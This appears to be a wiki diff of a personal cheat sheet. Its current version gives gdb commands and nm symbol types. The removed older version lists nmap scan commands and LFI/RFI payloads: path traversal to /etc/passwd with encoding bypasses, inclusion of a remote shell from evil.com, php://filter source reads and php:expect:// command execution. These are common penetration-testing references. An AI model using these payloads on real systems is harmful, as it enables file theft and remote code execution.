Difference between revisions of "Cheat Sheet"

m (Gnu Debugger (gdb))
 
(8 intermediate revisions by the same user not shown)
Line 1: Line 1:
====== nmap ======
+
== Gnu Debugger (gdb)  ==
<syntaxhighlight>
+
<syntaxhighlight  lang=shell-session highlight="" line>
nmap -sP 192.168.56.0/24
+
 
nmap -O -sT -sV -p- -T5 192.168.56.101
+
## Running
 +
gdb <program>
 +
gdb --args
 +
gdb --pid
 +
 
 +
set args
 +
run
 +
kill
 +
 
 +
## Navigation
 +
info functions
 +
info variables
 +
info scope <function name>
 +
 
 +
## Debugging
 +
# Breakpoints
 +
break *_start
 +
delete breakpoint#
 +
clear # delete all
 +
enable/disable breakpoint#
 +
 
 +
# Watchpoints
 +
watch *_start
 +
delete/enable/disable watchpoint#
 +
 
 +
# Move around
 +
move
 +
m
 +
step
 +
s
 +
finish
 +
f
 +
continue
 +
c
 
</syntaxhighlight>
 
</syntaxhighlight>
  
===== LFI / RFI =====
+
== nm / Name List ==
<syntaxhighlight>
+
<syntaxhighlight lang=shell-session highlight="" line>
http://example.com/index.php?page=../../../etc/passwd
+
## Symbol Types
http://example.com/index.php?page=../../../etc/passwd%00
+
A: Absolute Type
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
+
B: In the uninitialized data section (BSS)
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00
+
D: In the initialized data section
http://example.com/index.php?page=../../../../../../../../../etc/passwd..\.\.\.\.\.\.\.\.\.\.\[ADD MORE]\.\.
+
N: Debugging Symbol
http://example.com/index.php?page=../../../../[…]../../../../../etc/passwd
+
T: In the text section
http://example.com/index.php?page=....//....//etc/passwd
+
U: Undefined symbol
http://example.com/index.php?page=..///////..////..//////etc/passwd
 
http://example.com/index.php?page=http://evil.com/shell.txt
 
http://example.com/index.php?page=http://evil.com/shell.txt%00
 
http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt
 
http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
 
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
 
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php
 
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
 
http://example.com/index.php?page=php:expect://id
 
http://example.com/index.php?page=php:expect://ls
 
http://example.com/index.php?page=path/to/uploaded/file.png
 
 
</syntaxhighlight>
 
</syntaxhighlight>

Latest revision as of 14:55, 24 May 2018

Gnu Debugger (gdb)

## Running
gdb <program>
gdb --args
gdb --pid

set args
run
kill

## Navigation
info functions
info variables
info scope <function name>

## Debugging
# Breakpoints
break *_start
delete breakpoint#
clear # delete all 
enable/disable breakpoint#

# Watchpoints
watch *_start
delete/enable/disable watchpoint#

# Move around
move
m
step
s
finish
f
continue
c

nm / Name List

## Symbol Types
A: Absolute Type
B: In the uninitialized data section (BSS)
D: In the initialized data section
N: Debugging Symbol
T: In the text section
U: Undefined symbol